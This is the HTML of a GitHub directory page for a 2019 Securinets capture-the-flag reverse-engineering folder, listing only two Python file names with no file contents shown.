<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> acdwas </span> <span>/</span> ctf
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>5</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>25</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/acdwas/ctf/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":124655323,"originating_url":"https://github.com/acdwas/ctf/tree/master/2019/Securinets/rev","user_id":null}}" data-hydro-click-hmac="aa02098e3c71bb2b9804dc57efe327c1971026896914c5f7a81580ade241dfae"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/acdwas/ctf/refs" cache-key="v0:1675583418.5812821" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWNkd2FzL2N0Zg==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/acdwas/ctf/refs" cache-key="v0:1675583418.5812821" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWNkd2FzL2N0Zg==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf</span></span></span><span>/</span><span><span>2019</span></span><span>/</span><span><span>Securinets</span></span><span>/</span>rev<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf</span></span></span><span>/</span><span><span>2019</span></span><span>/</span><span><span>Securinets</span></span><span>/</span>rev<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/acdwas/ctf/tree-commit/773a121b9ebe30e8693ecf86a6231f1037b7b0a0/2019/Securinets/rev" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/acdwas/ctf/file-list/master/2019/Securinets/rev"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>Matrix_of_Hell!.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>RBOOM!.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
